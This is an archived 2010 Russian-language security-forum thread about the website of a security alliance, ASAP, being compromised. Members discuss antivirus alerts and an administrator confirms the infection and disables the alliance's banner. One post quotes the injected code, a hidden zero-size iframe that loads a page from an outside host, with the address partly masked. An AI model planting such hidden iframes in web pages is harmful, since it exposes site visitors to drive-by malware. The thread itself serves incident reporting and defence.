Показано с 1 по 11 из 11.

ASAP заражён?!

  1. #1
    Banned Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.05.2008
    Сообщений
    11
    Вес репутации
    0

    ASAP заражён?!



    престижное объединение индивидуальных экспертов и ресурсов, имеющих непосредственное отношение к Интернет-безопасности
    Престижный альянс ASAP (Alliance of Security Analysis Professionals, Альянс профессионалов в области анализа безопасности) заражён?
    Последний раз редактировалось ALEX(XX); 14.08.2010 в 20:45. Причина: ссылку деактивировали

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.09.2006
    Сообщений
    5,658
    Вес репутации
    1838
    Спасибо за сигнал, мы будем разбираться в ситуации. Вероятнее всего, произошло ложное срабатывание.
    [I]Nick Golovko
    NCFU lecturer, information security specialist[/I]

  4. #3
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    13.01.2008
    Адрес
    Воронежская обл.
    Сообщений
    243
    Вес репутации
    243
    LLG, а может, это зловред дописывает что-то "левое" правее к адресу?

  5. #4
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    09.10.2006
    Адрес
    Америка, Антигуа и Барбуда
    Сообщений
    1,214
    Вес репутации
    138
    А где тут вирус?
    Код:
    <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
    <!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
    "http://www.w3.org/TR/html4/strict.dtd"> -->
    <HTML>
    <HEAD>
    <META HTTP-EQUIV="Refresh" CONTENT="1.9">
    <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
    <META HTTP-EQUIV="Expires" CONTENT="-1">
    <TITLE></TITLE>
    </HEAD>
    <BODY><P></BODY>
    </HTML>
    там вроде упаковано gzip-пом это
    Последний раз редактировалось valho; 13.08.2010 в 21:28. Причина: добавлено

  6. #5
    Banned Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.05.2008
    Сообщений
    11
    Вес репутации
    0
    NickGolovko, если ложное срабатывание, то почему форум ASAP закрыт, а при активации ссылки сразу алерт касперского?

    плюс продолжается это всё уже с 11 августа....

    valho,
    Код:
    <iframe src='хттп://forums.maddoktor2.com/H****/exem***com/' width='0' height='0' frameborder='0'></iframe>

  7. #6
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    09.10.2006
    Адрес
    Америка, Антигуа и Барбуда
    Сообщений
    1,214
    Вес репутации
    138
    Не обратил внимание на этот сайт exem***com
    Вот это получается было http://www.securelist.com/en/descrip...t.JS.Pdfka.chq судя по сообщению из кэша
    Последний раз редактировалось valho; 13.08.2010 в 22:20. Причина: удалил ссылку

  8. #7
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ALEX(XX)
    Регистрация
    31.03.2005
    Адрес
    Чернигов
    Сообщений
    10,777
    Вес репутации
    3731
    Большому кораблю - большая торпеда!
    Left home for a few days and look what happens...

  9. #8
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.09.2009
    Сообщений
    125
    Вес репутации
    79
    Не зря всё таки советуют отключать iframe в браузере .

  10. #9
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.09.2006
    Сообщений
    5,658
    Вес репутации
    1838
    Похоже, что инфекция действительно присутствует. Баннер ASAP отключен до окончательного выяснения обстоятельств.

    Напоминаем: если вы столкнулись с возможным заражением на ресурсе, с которым мы состоим в каких-либо отношениях, не забывайте незамедлительно об этом сообщать - у участников административной команды нет сверхъестественных способностей, и поэтому мы не можем уследить сразу за всем.
    [I]Nick Golovko
    NCFU lecturer, information security specialist[/I]

  11. #10
    Banned Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.05.2008
    Сообщений
    11
    Вес репутации
    0
    NickGolovko, возникает только один вопрос: почему же ресурс-партнёр, зная о заражении и состоящий из профессионалов, не удосужился известить остальных о своих проблемах и минимализировать риск заражения пользователей...
    Последний раз редактировалось anton_dr; 14.08.2010 в 22:03. Причина: Не ройте себе яму

  12. #11
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.09.2006
    Сообщений
    5,658
    Вес репутации
    1838
    Точный ответ на ваш вопрос нам пока не известен.

    Добавлено через 7 часов 20 минут

    Итак, наши зарубежные коллеги окончательно подтвердили, что обсуждаемый ресурс был поражен. Особо отмечено, что в последние месяцы многие англоязычные ресурсы в сфере безопасности подвергались атакам; в ряде случаев злоумышленникам удалось проэксплуатировать уязвимости программного обеспечения даже на крупнейших сайтах в этом секторе. Что касается собственно сайта ASAP, то связаться с его основателем, который является единственным привилегированным администратором, не удается, так что перспективы дезинфекции остаются туманными. Баннер Альянса, таким образом, останется отключенным до тех пор, пока посещение обсуждаемого ресурса не станет вновь безопасным.
    Последний раз редактировалось NickGolovko; 14.08.2010 в 21:56. Причина: Добавлено
    [I]Nick Golovko
    NCFU lecturer, information security specialist[/I]

Похожие темы

  1. Членство в ASAP
    От NickGolovko в разделе Информационные сообщения
    Ответов: 10
    Последнее сообщение: 26.10.2010, 13:43
  2. Не загружается комп! ASAP!!
    От M@xWell в разделе Помогите!
    Ответов: 26
    Последнее сообщение: 22.02.2009, 01:54
  3. ASAP Membership
    От NickGolovko в разделе Site
    Ответов: 16
    Последнее сообщение: 11.12.2007, 19:19

Метки для этой темы

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00296 seconds with 17 queries